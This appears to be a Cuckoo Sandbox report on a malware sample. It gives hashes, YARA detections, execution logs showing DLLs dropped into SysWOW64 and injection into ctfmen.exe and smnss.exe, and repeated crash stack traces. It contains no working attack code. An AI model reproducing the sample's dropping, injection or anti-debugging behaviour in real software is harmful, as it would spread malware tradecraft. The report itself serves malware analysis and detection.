Cuckoo Sandbox

File 148a0a0924609c80_zipfi.dll

Summary
Download Resubmit sample

Size	75.7KB
Type	Zip archive data, at least v1.0 to extract, compression method=store
MD5	`5eaefbf3c61d399c5e536acb78d737a2`
SHA1	`06241697966a04cf65e295e30b9aac6b42b1c8dc`
SHA256	`148a0a0924609c80cc6d42e3622e08ed162289212691d7cc51faf4898dbfa4b9`
SHA512	`a1dc7912fd51724d8e94d86fac6afd8da05370010c0762b652fe84fa5b5134b34dfe1ff6404d18a340161a5dd315f7452b7c7db76eaddc8ce4ba1202d5d5413f`
CRC32	`6BBCAE3D`
ssdeep	`None`
Yara	vmdetect - Possibly employs anti-virtualization techniques anti_dbg - Checks if being debugged network_udp_sock - Communications over UDP network network_tcp_listen - Listen for incoming communication network_smtp_raw - Communications smtp network_dropper - File downloader/dropper network_tcp_socket - Communications over RAW socket network_dns - Communications use DNS escalate_priv - Escalade priviledges win_mutex - Create or check mutex

Score

This file is very suspicious, with a score of 10 out of 10!

Please notice: The scoring system is currently still in development and should be considered an alpha feature.

Autosubmit

Parent_Task_ID:5822691

Feedback

Expecting different results? Send us this analysis and we will inspect it. Click here

Information on Execution

Analysis

Category	Started	Completed	Duration	Routing	Logs
FILE	Jan. 29, 2025, 12:32 p.m.	Jan. 29, 2025, 12:37 p.m.	295 seconds	internet	Show Analyzer Log Show Cuckoo Log

Analyzer Log

2025-01-25 08:13:43,000 [analyzer] DEBUG: Starting analyzer from: C:\tmpl4240h
2025-01-25 08:13:43,000 [analyzer] DEBUG: Pipe server name: \??\PIPE\doQEOOeGelfNzylmzFkdSffBCy
2025-01-25 08:13:43,015 [analyzer] DEBUG: Log pipe server name: \??\PIPE\OnnjejpHxRZVHxJRZJhToIbjdFYmyqUr
2025-01-25 08:13:43,015 [analyzer] DEBUG: No analysis package specified, trying to detect it automagically.
2025-01-25 08:13:43,015 [analyzer] INFO: Automatically selected analysis package "zip"
2025-01-25 08:13:43,342 [analyzer] DEBUG: Started auxiliary module Curtain
2025-01-25 08:13:43,342 [analyzer] DEBUG: Started auxiliary module DbgView
2025-01-25 08:13:43,750 [analyzer] DEBUG: Started auxiliary module Disguise
2025-01-25 08:13:43,967 [analyzer] DEBUG: Loaded monitor into process with pid 508
2025-01-25 08:13:43,967 [analyzer] DEBUG: Started auxiliary module DumpTLSMasterSecrets
2025-01-25 08:13:43,967 [analyzer] DEBUG: Started auxiliary module Human
2025-01-25 08:13:43,967 [analyzer] DEBUG: Started auxiliary module InstallCertificate
2025-01-25 08:13:43,967 [analyzer] DEBUG: Started auxiliary module Reboot
2025-01-25 08:13:44,046 [analyzer] DEBUG: Started auxiliary module RecentFiles
2025-01-25 08:13:44,046 [analyzer] DEBUG: Started auxiliary module Screenshots
2025-01-25 08:13:44,062 [analyzer] DEBUG: Started auxiliary module Sysmon
2025-01-25 08:13:44,062 [analyzer] DEBUG: Started auxiliary module LoadZer0m0n
2025-01-25 08:13:44,062 [modules.packages.zip] DEBUG: Missing file option, auto executing: Readme.exe
2025-01-25 08:13:44,187 [lib.api.process] INFO: Successfully executed process from path 'C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\Readme.exe' with arguments '' and pid 2488
2025-01-25 08:13:44,390 [analyzer] DEBUG: Loaded monitor into process with pid 2488
2025-01-25 08:13:44,390 [analyzer] INFO: Added new file to list with pid 2488 and path C:\Windows\SysWOW64\ctfmen.exe
2025-01-25 08:13:44,437 [analyzer] INFO: Added new file to list with pid 2488 and path C:\Windows\SysWOW64\shervans.dll
2025-01-25 08:13:44,453 [analyzer] INFO: Added new file to list with pid 2488 and path C:\Windows\SysWOW64\grcopy.dll
2025-01-25 08:13:44,530 [analyzer] INFO: Added new file to list with pid 2488 and path C:\Windows\SysWOW64\satornas.dll
2025-01-25 08:13:48,592 [analyzer] INFO: Injected into process with pid 1316 and name u'ctfmen.exe'
2025-01-25 08:13:48,733 [analyzer] DEBUG: Loaded monitor into process with pid 1316
2025-01-25 08:13:48,796 [analyzer] INFO: Injected into process with pid 2276 and name u'smnss.exe'
2025-01-25 08:13:48,967 [analyzer] DEBUG: Loaded monitor into process with pid 2276
2025-01-25 08:13:48,967 [analyzer] INFO: Added new file to list with pid 2276 and path C:\Windows\SysWOW64\zipfi.dll
2025-01-25 08:13:49,062 [analyzer] INFO: Added new file to list with pid 2276 and path C:\Windows\SysWOW64\zipfiaq.dll
2025-01-25 08:13:49,187 [analyzer] INFO: Process with pid 2488 has terminated
2025-01-25 08:13:50,187 [analyzer] INFO: Process with pid 1316 has terminated
2025-01-25 08:14:06,187 [analyzer] INFO: Process with pid 2276 has terminated
2025-01-25 08:14:06,187 [analyzer] INFO: Process list is empty, terminating analysis.
2025-01-25 08:14:07,578 [analyzer] INFO: Terminating remaining processes before shutdown.
2025-01-25 08:14:07,608 [analyzer] INFO: Analysis completed.

Cuckoo Log

2025-01-29 12:32:38,134 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:39,194 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:40,240 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:41,310 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:42,370 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:43,403 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:44,438 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:45,465 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:46,491 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:47,533 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:48,567 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:49,601 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:50,638 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:51,667 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:52,705 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:53,737 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:54,770 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:55,953 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:57,001 [cuckoo.core.scheduler] DEBUG: Task #5848427: no machine available yet
2025-01-29 12:32:58,093 [cuckoo.core.scheduler] INFO: Task #5848427: acquired machine win7x649 (label=win7x649)
2025-01-29 12:32:58,208 [cuckoo.core.resultserver] DEBUG: Now tracking machine 192.168.168.209 for task #5848427
2025-01-29 12:32:58,584 [cuckoo.auxiliary.sniffer] INFO: Started sniffer with PID 1436026 (interface=vboxnet0, host=192.168.168.209)
2025-01-29 12:32:58,609 [androguard.apk] WARNING: Missing AndroidManifest.xml. Is this an APK file?
2025-01-29 12:32:58,670 [cuckoo.machinery.virtualbox] DEBUG: Starting vm win7x649
2025-01-29 12:32:59,653 [cuckoo.machinery.virtualbox] DEBUG: Restoring virtual machine win7x649 to vmcloak
2025-01-29 12:35:24,131 [cuckoo.core.guest] INFO: Starting analysis #5848427 on guest (id=win7x649, ip=192.168.168.209)
2025-01-29 12:35:25,136 [cuckoo.core.guest] DEBUG: win7x649: not ready yet
2025-01-29 12:35:30,159 [cuckoo.core.guest] INFO: Guest is running Cuckoo Agent 0.10 (id=win7x649, ip=192.168.168.209)
2025-01-29 12:35:30,284 [cuckoo.core.guest] DEBUG: Uploading analyzer to guest (id=win7x649, ip=192.168.168.209, monitor=latest, size=6660546)
2025-01-29 12:35:31,488 [cuckoo.core.resultserver] DEBUG: Task #5848427: live log analysis.log initialized.
2025-01-29 12:35:32,487 [cuckoo.core.resultserver] DEBUG: Task #5848427 is sending a BSON stream
2025-01-29 12:35:32,819 [cuckoo.core.resultserver] DEBUG: Task #5848427 is sending a BSON stream
2025-01-29 12:35:33,661 [cuckoo.core.resultserver] DEBUG: Task #5848427: File upload for 'shots/0001.jpg'
2025-01-29 12:35:33,672 [cuckoo.core.resultserver] DEBUG: Task #5848427 uploaded file length: 133465
2025-01-29 12:35:37,173 [cuckoo.core.resultserver] DEBUG: Task #5848427 is sending a BSON stream
2025-01-29 12:35:37,391 [cuckoo.core.resultserver] DEBUG: Task #5848427 is sending a BSON stream
2025-01-29 12:35:46,943 [cuckoo.core.guest] DEBUG: win7x649: analysis #5848427 still processing
2025-01-29 12:35:55,888 [cuckoo.core.resultserver] DEBUG: Task #5848427: File upload for 'curtain/1737789247.38.curtain.log'
2025-01-29 12:35:55,893 [cuckoo.core.resultserver] DEBUG: Task #5848427 uploaded file length: 36
2025-01-29 12:35:56,067 [cuckoo.core.resultserver] DEBUG: Task #5848427: File upload for 'sysmon/1737789247.53.sysmon.xml'
2025-01-29 12:35:56,201 [cuckoo.core.resultserver] DEBUG: Task #5848427 uploaded file length: 1555094
2025-01-29 12:35:56,223 [cuckoo.core.resultserver] DEBUG: Task #5848427 had connection reset for <Context for LOG>
2025-01-29 12:35:56,234 [cuckoo.core.resultserver] DEBUG: Task #5848427: File upload for 'files/de28df3e89f794d4_grcopy.dll'
2025-01-29 12:35:56,240 [cuckoo.core.resultserver] DEBUG: Task #5848427 uploaded file length: 77445
2025-01-29 12:35:56,248 [cuckoo.core.resultserver] DEBUG: Task #5848427: File upload for 'files/ba207b4a26b4f41e_zipfi.dll'
2025-01-29 12:35:56,256 [cuckoo.core.resultserver] DEBUG: Task #5848427 uploaded file length: 77563
2025-01-29 12:35:56,266 [cuckoo.core.resultserver] DEBUG: Task #5848427: File upload for 'files/183a2d03a872891c_ctfmen.exe'
2025-01-29 12:35:56,280 [cuckoo.core.resultserver] DEBUG: Task #5848427 uploaded file length: 4160
2025-01-29 12:35:56,283 [cuckoo.core.resultserver] DEBUG: Task #5848427: File upload for 'files/96bc0520373ce88b_zipfiaq.dll'
2025-01-29 12:35:56,288 [cuckoo.core.resultserver] DEBUG: Task #5848427 uploaded file length: 77559
2025-01-29 12:35:56,290 [cuckoo.core.resultserver] DEBUG: Task #5848427: File upload for 'files/f87c062af889854e_satornas.dll'
2025-01-29 12:35:56,294 [cuckoo.core.resultserver] DEBUG: Task #5848427 uploaded file length: 183
2025-01-29 12:35:56,297 [cuckoo.core.resultserver] DEBUG: Task #5848427: File upload for 'files/7a3d3de3f670f4bf_shervans.dll'
2025-01-29 12:35:56,302 [cuckoo.core.resultserver] DEBUG: Task #5848427 uploaded file length: 8704
2025-01-29 12:35:59,093 [cuckoo.core.guest] INFO: win7x649: analysis completed successfully
2025-01-29 12:35:59,129 [cuckoo.core.plugins] DEBUG: Stopped auxiliary module: Redsocks
2025-01-29 12:35:59,158 [cuckoo.core.plugins] DEBUG: Stopped auxiliary module: Sniffer
2025-01-29 12:36:00,120 [cuckoo.machinery.virtualbox] INFO: Successfully generated memory dump for virtual machine with label win7x649 to path /srv/cuckoo/cwd/storage/analyses/5848427/memory.dmp
2025-01-29 12:36:00,123 [cuckoo.machinery.virtualbox] DEBUG: Stopping vm win7x649
2025-01-29 12:37:32,859 [cuckoo.core.resultserver] DEBUG: Stopped tracking machine 192.168.168.209 for task #5848427
2025-01-29 12:37:33,816 [cuckoo.core.scheduler] DEBUG: Released database task #5848427
2025-01-29 12:37:33,849 [cuckoo.core.scheduler] INFO: Task #5848427: analysis procedure completed

Signatures

Yara rules detected for file (10 events)

description	Possibly employs anti-virtualization techniques	rule	vmdetect
description	Checks if being debugged	rule	anti_dbg
description	Communications over UDP network	rule	network_udp_sock
description	Listen for incoming communication	rule	network_tcp_listen
description	Communications smtp	rule	network_smtp_raw
description	File downloader/dropper	rule	network_dropper
description	Communications over RAW socket	rule	network_tcp_socket
description	Communications use DNS	rule	network_dns
description	Escalade priviledges	rule	escalate_priv
description	Create or check mutex	rule	win_mutex

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Jan. 25, 2025, 9:13 a.m.			0	0
IsDebuggerPresent Jan. 25, 2025, 9:13 a.m.			0	0

One or more processes crashed (15 events)

Time & API	Arguments	Status
__exception__ Jan. 25, 2025, 9:13 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77ba35b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77ba34a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x76e1537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45 exception.instruction_r: 31 06 8a 46 01 32 06 32 46 02 38 46 03 0f 85 97 exception.symbol: RtlImageNtHeader+0x1224 RtlDeleteCriticalSection-0x26d ntdll+0x343b8 exception.instruction: xor dword ptr [esi], eax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 213944 exception.address: 0x77ba43b8 registers.esp: 68155584 registers.edi: 7340032 registers.eax: 1205673936 registers.ebp: 68155624 registers.edx: 2047 registers.ebx: 3481048 registers.esi: 3253200 registers.ecx: 104	1
__exception__ Jan. 25, 2025, 9:13 a.m.	stacktrace: RtlImageNtHeader+0xac6 RtlDeleteCriticalSection-0x9cb ntdll+0x33c5a @ 0x77ba3c5a RtlImageNtHeader+0xb6a RtlDeleteCriticalSection-0x927 ntdll+0x33cfe @ 0x77ba3cfe DnsApiFree+0x4a DnsApiAlloc-0x2e dnsapi+0x3195 @ 0x74aa3195 DnsApiFree+0x22 DnsApiAlloc-0x56 dnsapi+0x316d @ 0x74aa316d WSPStartup-0x36b4 mswsock+0x53f7 @ 0x73af53f7 WSPStartup-0x3730 mswsock+0x537b @ 0x73af537b WSPStartup-0x386f mswsock+0x523c @ 0x73af523c WSALookupServiceBeginW+0x257 WSAEventSelect-0xade ws2_32+0x59b1 @ 0x76d959b1 WSALookupServiceBeginW+0x233 WSAEventSelect-0xb02 ws2_32+0x598d @ 0x76d9598d WSALookupServiceBeginW+0x1c2 WSAEventSelect-0xb73 ws2_32+0x591c @ 0x76d9591c WSALookupServiceBeginW+0x72 WSAEventSelect-0xcc3 ws2_32+0x57cc @ 0x76d957cc WSALookupServiceBeginA+0x74 WahCloseApcHelper-0x3b1 ws2_32+0xa6b6 @ 0x76d9a6b6 gethostname+0x1bd WSALookupServiceNextA-0x63 ws2_32+0xa218 @ 0x76d9a218 gethostbyname+0xe7 WSCInstallProviderAndChains-0x1039 ws2_32+0x1775a @ 0x76da775a New_ws2_32_gethostbyname@4+0xab New_ws2_32_getsockname@12-0x63 @ 0x7426c3e3 smnss+0x6326 @ 0x406326 smnss+0x600e @ 0x40600e smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45 exception.instruction_r: 8b 49 04 89 55 ec 8b 12 3b d1 0f 85 fa 25 03 00 exception.symbol: RtlCleanUpTEBLangLists+0x9a RtlGetLastWin32Error-0x3a3 ntdll+0x58118 exception.instruction: mov ecx, dword ptr [ecx + 4] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 360728 exception.address: 0x77bc8118 registers.esp: 68153040 registers.edi: 3481000 registers.eax: 3481056 registers.ebp: 68153076 registers.edx: 3481136 registers.ebx: 3473408 registers.esi: 3481048 registers.ecx: 0	1
__exception__ Jan. 25, 2025, 9:13 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77ba35b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77ba34a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x76e1537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45 exception.instruction_r: 31 06 8a 46 01 32 06 32 46 02 38 46 03 0f 85 97 exception.symbol: RtlImageNtHeader+0x1224 RtlDeleteCriticalSection-0x26d ntdll+0x343b8 exception.instruction: xor dword ptr [esi], eax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 213944 exception.address: 0x77ba43b8 registers.esp: 68155584 registers.edi: 7340032 registers.eax: 1205673936 registers.ebp: 68155624 registers.edx: 2047 registers.ebx: 3481640 registers.esi: 3253392 registers.ecx: 114	1
__exception__ Jan. 25, 2025, 9:13 a.m.	stacktrace: RtlImageNtHeader+0xac6 RtlDeleteCriticalSection-0x9cb ntdll+0x33c5a @ 0x77ba3c5a RtlImageNtHeader+0xb6a RtlDeleteCriticalSection-0x927 ntdll+0x33cfe @ 0x77ba3cfe DnsApiFree+0x4a DnsApiAlloc-0x2e dnsapi+0x3195 @ 0x74aa3195 DnsApiFree+0x22 DnsApiAlloc-0x56 dnsapi+0x316d @ 0x74aa316d WSPStartup-0x36b4 mswsock+0x53f7 @ 0x73af53f7 WSPStartup-0x3730 mswsock+0x537b @ 0x73af537b WSPStartup-0x386f mswsock+0x523c @ 0x73af523c WSALookupServiceBeginW+0x257 WSAEventSelect-0xade ws2_32+0x59b1 @ 0x76d959b1 WSALookupServiceBeginW+0x233 WSAEventSelect-0xb02 ws2_32+0x598d @ 0x76d9598d WSALookupServiceBeginW+0x1c2 WSAEventSelect-0xb73 ws2_32+0x591c @ 0x76d9591c WSALookupServiceBeginW+0x72 WSAEventSelect-0xcc3 ws2_32+0x57cc @ 0x76d957cc WSALookupServiceBeginA+0x74 WahCloseApcHelper-0x3b1 ws2_32+0xa6b6 @ 0x76d9a6b6 gethostname+0x1bd WSALookupServiceNextA-0x63 ws2_32+0xa218 @ 0x76d9a218 gethostbyname+0xe7 WSCInstallProviderAndChains-0x1039 ws2_32+0x1775a @ 0x76da775a New_ws2_32_gethostbyname@4+0xab New_ws2_32_getsockname@12-0x63 @ 0x7426c3e3 smnss+0x6326 @ 0x406326 smnss+0x600e @ 0x40600e smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45 exception.instruction_r: 8b 49 04 89 55 ec 8b 12 3b d1 0f 85 fa 25 03 00 exception.symbol: RtlCleanUpTEBLangLists+0x9a RtlGetLastWin32Error-0x3a3 ntdll+0x58118 exception.instruction: mov ecx, dword ptr [ecx + 4] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 360728 exception.address: 0x77bc8118 registers.esp: 68153040 registers.edi: 3481512 registers.eax: 3481648 registers.ebp: 68153076 registers.edx: 3475440 registers.ebx: 3473408 registers.esi: 3481640 registers.ecx: 0	1
__exception__ Jan. 25, 2025, 9:13 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77ba35b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77ba34a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x76e1537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45 exception.instruction_r: 8b 06 89 45 e4 33 47 50 8a c8 32 cc 89 45 e4 32 exception.symbol: RtlImageNtHeader+0x139 RtlDeleteCriticalSection-0x1358 ntdll+0x332cd exception.instruction: mov eax, dword ptr [esi] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 209613 exception.address: 0x77ba32cd registers.esp: 68155584 registers.edi: 7340032 registers.eax: 20993 registers.ebp: 68155624 registers.edx: 2047 registers.ebx: 3483016 registers.esi: 3650960 registers.ecx: 1	1
__exception__ Jan. 25, 2025, 9:13 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77ba35b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77ba34a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x76e1537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45 exception.instruction_r: 8b 06 89 45 e4 33 47 50 8a c8 32 cc 89 45 e4 32 exception.symbol: RtlImageNtHeader+0x139 RtlDeleteCriticalSection-0x1358 ntdll+0x332cd exception.instruction: mov eax, dword ptr [esi] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 209613 exception.address: 0x77ba32cd registers.esp: 70252736 registers.edi: 7340032 registers.eax: 20993 registers.ebp: 70252776 registers.edx: 2047 registers.ebx: 3480344 registers.esi: 3648288 registers.ecx: 173	1
__exception__ Jan. 25, 2025, 9:13 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77ba35b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77ba34a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x76e1537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45 exception.instruction_r: 31 06 8a 46 01 32 06 32 46 02 38 46 03 0f 85 97 exception.symbol: RtlImageNtHeader+0x1224 RtlDeleteCriticalSection-0x26d ntdll+0x343b8 exception.instruction: xor dword ptr [esi], eax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 213944 exception.address: 0x77ba43b8 registers.esp: 72349888 registers.edi: 7340032 registers.eax: 1205673936 registers.ebp: 72349928 registers.edx: 2047 registers.ebx: 3485592 registers.esi: 3257392 registers.ecx: 12	1
__exception__ Jan. 25, 2025, 9:13 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77ba35b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77ba34a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x76e1537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45 exception.instruction_r: 8b 06 89 45 e4 33 47 50 8a c8 32 cc 89 45 e4 32 exception.symbol: RtlImageNtHeader+0x139 RtlDeleteCriticalSection-0x1358 ntdll+0x332cd exception.instruction: mov eax, dword ptr [esi] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 209613 exception.address: 0x77ba32cd registers.esp: 74447040 registers.edi: 7340032 registers.eax: 20993 registers.ebp: 74447080 registers.edx: 2047 registers.ebx: 3483944 registers.esi: 3651888 registers.ecx: 65	1
__exception__ Jan. 25, 2025, 9:14 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77ba35b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77ba34a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x76e1537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45 exception.instruction_r: 8b 06 89 45 e4 33 47 50 8a c8 32 cc 89 45 e4 32 exception.symbol: RtlImageNtHeader+0x139 RtlDeleteCriticalSection-0x1358 ntdll+0x332cd exception.instruction: mov eax, dword ptr [esi] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 209613 exception.address: 0x77ba32cd registers.esp: 76544192 registers.edi: 7340032 registers.eax: 20993 registers.ebp: 76544232 registers.edx: 2047 registers.ebx: 3480616 registers.esi: 3648560 registers.ecx: 1	1
__exception__ Jan. 25, 2025, 9:14 a.m.	stacktrace: RtlImageNtHeader+0xac6 RtlDeleteCriticalSection-0x9cb ntdll+0x33c5a @ 0x77ba3c5a RtlImageNtHeader+0xb6a RtlDeleteCriticalSection-0x927 ntdll+0x33cfe @ 0x77ba3cfe DnsApiFree+0x4a DnsApiAlloc-0x2e dnsapi+0x3195 @ 0x74aa3195 DnsApiFree+0x22 DnsApiAlloc-0x56 dnsapi+0x316d @ 0x74aa316d WSPStartup-0x36b4 mswsock+0x53f7 @ 0x73af53f7 WSPStartup-0x3730 mswsock+0x537b @ 0x73af537b WSPStartup-0x386f mswsock+0x523c @ 0x73af523c WSALookupServiceBeginW+0x257 WSAEventSelect-0xade ws2_32+0x59b1 @ 0x76d959b1 WSALookupServiceBeginW+0x233 WSAEventSelect-0xb02 ws2_32+0x598d @ 0x76d9598d WSALookupServiceBeginW+0x1c2 WSAEventSelect-0xb73 ws2_32+0x591c @ 0x76d9591c WSALookupServiceBeginW+0x72 WSAEventSelect-0xcc3 ws2_32+0x57cc @ 0x76d957cc WSALookupServiceBeginA+0x74 WahCloseApcHelper-0x3b1 ws2_32+0xa6b6 @ 0x76d9a6b6 gethostname+0x1bd WSALookupServiceNextA-0x63 ws2_32+0xa218 @ 0x76d9a218 gethostbyname+0xe7 WSCInstallProviderAndChains-0x1039 ws2_32+0x1775a @ 0x76da775a New_ws2_32_gethostbyname@4+0xab New_ws2_32_getsockname@12-0x63 @ 0x7426c3e3 smnss+0x6326 @ 0x406326 smnss+0x600e @ 0x40600e smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45 exception.instruction_r: 8b 49 04 89 55 ec 8b 12 3b d1 0f 85 fa 25 03 00 exception.symbol: RtlCleanUpTEBLangLists+0x9a RtlGetLastWin32Error-0x3a3 ntdll+0x58118 exception.instruction: mov ecx, dword ptr [ecx + 4] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 360728 exception.address: 0x77bc8118 registers.esp: 76541648 registers.edi: 3480536 registers.eax: 3480624 registers.ebp: 76541684 registers.edx: 3484032 registers.ebx: 3473408 registers.esi: 3480616 registers.ecx: 0	1
